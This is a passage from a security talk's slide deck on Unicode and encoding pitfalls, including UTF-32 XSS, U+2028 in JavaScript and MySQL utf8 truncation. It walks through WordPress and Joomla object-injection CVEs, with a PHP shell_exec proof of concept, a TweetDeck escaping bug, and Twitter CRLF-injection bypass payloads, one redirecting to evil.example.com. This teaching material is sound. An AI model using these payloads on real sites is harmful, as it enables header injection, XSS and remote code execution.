    000003e0
    (U+6970 CJK UNIFIED
    IDEOGRAPH-6970)

    View Slide

  79. http://mths.be/brm

    View Slide

  80. http://mths.be/brm
    ∀scriptalert(1)/script

    View Slide

  81. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c

    View Slide

  82. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c

    View Slide

  83. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c
    ∀ (U+2200 FOR ALL)

    View Slide

  84. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c
    (U+3E00 CJK UNIFIED
    IDEOGRAPH-3E00)

    View Slide

  85. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c
    (U+3C00 CJK UNIFIED
    IDEOGRAPH-3C00)

    View Slide

  86. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c
    s (U+0073 LATIN SMALL
    LETTER S)

    View Slide

  87. View Slide

  88. View Slide

  89. https://mths.be/brl

    View Slide

  90. https://mths.be/brl
    OBAMA vs. ᴼᴮᴬᴹᴬ

    View Slide

  91. View Slide

  92. https://mths.be/bvf

    View Slide

  93. https://mths.be/bvf

    View Slide

  94. JavaScript vs. JSON

    View Slide

  95. <br/>// <?php echo strip($userInput); ?><br/>
    /* Note:
    `strip()` strips ASCII newlines and `*/
    ?>

    View Slide

  96. https://mths.be/brn

    View Slide

  97. https://mths.be/brn

    View Slide

  98. <br/>// <?php echo strip($userInput); ?><br/>
    foo[U+2028]alert('XSS')

    View Slide

  99. <br/>// <?php echo strip($userInput); ?><br/>

    foo[U+2028]alert('XSS')

    View Slide

  100. JSON ∉ JavaScript

    View Slide

  101. var data = '"Hello\u2028"';
    // JSON-formatted data containing a string
    // containing an (unescaped!) Line Separator
    eval('(' + data + ')');
    //
    h
    SyntaxError: Unexpected token ILLEGAL
    JSON.parse(data);
    //
    h
    'Hello\u2028'

    View Slide

  102. Always escape JSON-formatted data
    before passing it to a JavaScript parser.
    https://mths.be/jsesc

    View Slide

  103. https://mths.be/jsesc

    View Slide

  104. var data = 'foo\u2028';
    var serialized = JSON.stringify(data);
    //
    h
    '"foo\u2028"' (contains the raw, unescaped
    // Unicode symbol)
    var escaped = jsesc(data, { 'json': true });
    //
    h
    '"foo\\u2028"' (contains an escape sequence
    // for the Unicode symbol
    h
    safer)
    JSON.parse(serialized) == JSON.parse(escaped);
    //
    h
    true (both strings unserialize to the same value)
    https://mths.be/jsesc

    View Slide

  105. var data = 'foo\u2028';
    var serialized = JSON.stringify(data);
    //
    h
    '"foo\u2028"' (contains the raw, unescaped
    // Unicode symbol)
    var escaped = jsesc(data, { 'json': true });
    //
    h
    '"foo\\u2028"' (contains an escape sequence
    // for the Unicode symbol
    h
    safer)
    JSON.parse(serialized) == JSON.parse(escaped);
    //
    h
    true (both strings unserialize to the same value)
    https://mths.be/jsesc

    View Slide

  106. var string = String.fromCharCode(0xD800);
    // a string containing an (unescaped!)
    // lone surrogate
    var data = JSON.stringify(string);
    // the same string as JSON-formatted data
    storeInDatabaseAsUtf8(data);
    //
    h
    error/crash
    sendOverWebSocketConnection(data);
    //
    h
    error/crash/DoS

    View Slide

  107. Always escape JSON-formatted data
    before passing it to a UTF-8 encoder.
    https://mths.be/jsesc

    View Slide

  108. https://mths.be/jsesc

    View Slide

  109. var data = 'foo\uD800';
    var serialized = JSON.stringify(data);
    //
    h
    '"foo\uD800"' (contains the raw, unescaped
    // Unicode symbol)
    var escaped = jsesc(data, { 'json': true });
    //
    h
    '"foo\\uD800"' (contains an escape sequence
    // for the Unicode symbol
    h
    safer)
    JSON.parse(serialized) == JSON.parse(escaped);
    //
    h
    true (both strings unserialize to the same value)
    https://mths.be/jsesc

    View Slide

  110. var data = 'foo\uD800';
    var serialized = JSON.stringify(data);
    //
    h
    '"foo\uD800"' (contains the raw, unescaped
    // Unicode symbol)
    var escaped = jsesc(data, { 'json': true });
    //
    h
    '"foo\\uD800"' (contains an escape sequence
    // for the Unicode symbol
    h
    safer)
    JSON.parse(serialized) == JSON.parse(escaped);
    //
    h
    true (both strings unserialize to the same value)
    https://mths.be/jsesc

    View Slide

  111. Phabricator

    View Slide

  112. View Slide

  113. View Slide

  114. View Slide

  115. uses MySQL

    View Slide

  116. uses MySQL’s ✌utf8✌

    View Slide

  117. View Slide

  118. View Slide

  119. https://mths.be/bro

    View Slide

  120. RCE in WordPress < 3.6.1
    https://mths.be/brq

    View Slide

  121. CVE-2013-4338
    “wp-includes/functions.php in WordPress before 3.6.1 does
    not properly determine whether data has been serialize()d,
    which allows remote attackers to execute arbitrary code by
    triggering erroneous PHP unserialize() operations.”
    https://mths.be/brq

    View Slide

  122. function is_serialized( $data ) {
    $data = trim( $data );
    $length = strlen( $data );
    $lastc = $data[$length - 1];
    if ( ';' !== $lastc && '}' !== $lastc )
    return false;
    $token = $data[0];
    switch ( $token ) {
    case 's' :
    if ( '"' !== $data[$length - 2] ) return false;
    case 'a' : case 'O' :
    return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
    case 'b' : case 'i' : case 'd' :
    return (bool) preg_match( "/^{$token}:[0-9.E-]+;\$/",
    $data );
    }
    return false;
    }
    https://mths.be/brq

    View Slide

  123. function is_serialized( $data ) {
    $data = trim( $data );
    $length = strlen( $data );
    $lastc = $data[$length - 1];
    if ( ';' !== $lastc && '}' !== $lastc )
    return false;
    $token = $data[0];
    switch ( $token ) {
    case 's' :
    if ( '"' !== $data[$length - 2] ) return false;
    case 'a' : case 'O' :
    return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
    case 'b' : case 'i' : case 'd' :
    return (bool) preg_match( "/^{$token}:[0-9.E-]+;\$/",
    $data );
    }
    return false;
    }
    https://mths.be/brq

    View Slide

  124. WordPress
    Before writing it to the database, data gets serialized
    only if it’s an array or an object, or if is_serialized($data)
    returns true (double serialization)
    After retrieving data from the database, it gets unserialized
    only if is_serialized($data) returns true
    https://mths.be/brq

    View Slide

  125. WordPress
    Before writing it to the database, data gets serialized
    only if it’s an array or an object, or if is_serialized($data)
    returns true (double serialization)
    After retrieving data from the database, it gets unserialized
    only if is_serialized($data) returns true
    https://mths.be/brq
    uses MySQL’s ✌utf8✌

    View Slide

  126. http://mths.be/brq

    View Slide

  127. http://mths.be/brq

    View Slide

  128. class Foo {
    private $command;
    public function setCommand($command) {
    $this->command = $command;
    }
    public function __destruct() {
    if ($this->command) {
    shell_exec($this->command);
    }
    }
    }
    $object = new Foo();
    $object->setCommand('echo "pwned!" > /tmp/pwned.txt');
    $serialized = serialize($object);
    $payload = $serialized . '!';
    https://mths.be/brq

    View Slide

  129. https://mths.be/brq

    View Slide

  130. RCE in Joomla < 3.4.6
    https://mths.be/bvg

    View Slide

  131. CVE-2015-8562
    “Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers
    to conduct PHP object injection attacks and execute arbitrary
    PHP code via the HTTP User-Agent header, as exploited in the
    wild in December 2015.”
    https://mths.be/bvg

    View Slide

  132. https://mths.be/bvh
    Exploit
    1. Serialize a specially-crafted object
    containing PHP code to be executed
    2. Use that as HTTP User-Agent header
    value, with ! as suffix

    View Slide

  133. XSS in WordPress < 4.1.2
    https://mths.be/buj

    View Slide

  134. foo

    https://mths.be/buj
    Exploit: post comment

    View Slide

  135. foo

    https://mths.be/buj
    Exploit: post comment
    This is safe HTML (no XSS).

    View Slide

  136. foo

    https://mths.be/buj
    Exploit: post comment
    This is safe HTML (no XSS).
    While saving to the ✌utf8✌ MySQL database, it gets
    truncated, so we get:

    View Slide

  137. foo

    https://mths.be/buj
    Exploit: post comment
    foo

    This is safe HTML (no XSS).
    While saving to the ✌utf8✌ MySQL database, it gets
    truncated, so we get:

    View Slide

  138. https://mths.be/buj

    View Slide

  139. TweetDeck

    View Slide

  140. View Slide

  141. View Slide

  142. View Slide

  143. function getTweetHtml(tweet) {
    var htmlEscapedTweet = htmlEscape(tweet);
    if (containsEmoji(htmlEscapedTweet)) {
    return replaceSymbolsWithImgTags(
    AccidentallyUndoHtmlEscaping(htmlEscapedTweet)
    );
    } else {
    return htmlEscapedTweet;
    }
    }
    https://mths.be/bsq

    View Slide

  144. Twitter

    View Slide

  145. https://mths.be/bsq
    https://mths.be/buh

    View Slide

  146. https://mths.be/buh
    symbol CR + LF
    code point U+000A U+000D
    URL-encoded
    (note: uses UTF-8!)
    %0A%0D
    decoded (raw bytes) [ 0x0A, 0x0D ]
    Broken CRLF filtering
    symbol CR + LF
    code point U+000A U+000D
    URL-encoded
    (note: uses UTF-8!)
    %0A%0D
    decoded (raw bytes) [ 0x0A, 0x0D ]

    View Slide

  147. https://mths.be/buh
    symbol CR + LF
    code point U+000A U+000D
    URL-encoded
    (note: uses UTF-8!)
    %0A%0D
    decoded (raw bytes) [ 0x0A, 0x0D ]
    Broken CRLF filtering
    symbol CR + LF
    code point U+000A U+000D
    URL-encoded
    (note: uses UTF-8!)
    %0A%0D
    decoded (raw bytes) [ 0x0A, 0x0D ]

    View Slide

  148. https://mths.be/buh
    symbol 㻿
    code point U+560A
    URL-encoded
    (note: uses UTF-8!)
    %E5%98%8A
    decoded (raw bytes) [ 0x56, 0x0A ]
    Bypass part 1: CR (U+000A)

    View Slide

  149. https://mths.be/buh
    symbol 㼁
    code point U+560D
    URL-encoded
    (note: uses UTF-8!)
    %E5%98%8D
    decoded (raw bytes) [ 0x56, 0x0D ]
    Bypass part 2: LF (U+000D)

    View Slide

  150. https://mths.be/buh
    Example exploit
    %E5%98%8A%E5%98%8DSet-Cookie:%20test

    View Slide

  151. View Slide

  152. https://mths.be/bve

    View Slide

  153. https://mths.be/buh
    symbol CR + LF
    code point U+000A U+000D
    URL-encoded
    (note: uses UTF-8!)
    %0A%0D
    decoded (raw bytes) [ 0x0A, 0x0D ]
    Broken CRLF filtering
    symbol CR + LF
    code point U+000A U+000D
    URL-encoded
    (note: uses UTF-8!)
    %0A%0D
    decoded (raw bytes) [ 0x0A, 0x0D ]

    View Slide

  154. https://mths.be/buh
    symbol CR + LF
    code point U+000A U+000D
    URL-encoded
    (note: uses UTF-8!)
    %0A%0D
    decoded (raw bytes) [ 0x0A, 0x0D ]
    Broken CRLF filtering
    symbol CR + LF
    code point U+000A U+000D
    URL-encoded
    (note: uses UTF-8!)
    %0A%0D
    decoded (raw bytes) [ 0x0A, 0x0D ]

    View Slide

  155. https://mths.be/bve
    symbol 㻿
    code point U+560A
    URL-encoded
    (note: uses UTF-8!)
    %E5%98%8A
    decoded (raw bytes) [ 0x56, 0x0A ]
    Bypass part 1: CR (U+000A)

    View Slide

  156. https://mths.be/bve
    symbol 㼁
    code point U+560D
    URL-encoded
    (note: uses UTF-8!)
    %E5%98%8D
    decoded (raw bytes) [ 0x56, 0x0D ]
    Bypass part 2: LF (U+000D)

    View Slide

  157. https://mths.be/bve
    Example exploit
    %E5%98%8A%E5%98%8DLocation:%20https:
    %2F%2Fevil.example.com%2F

    View Slide

  158. Thanks!
    Questions? → @mathias

    View Slide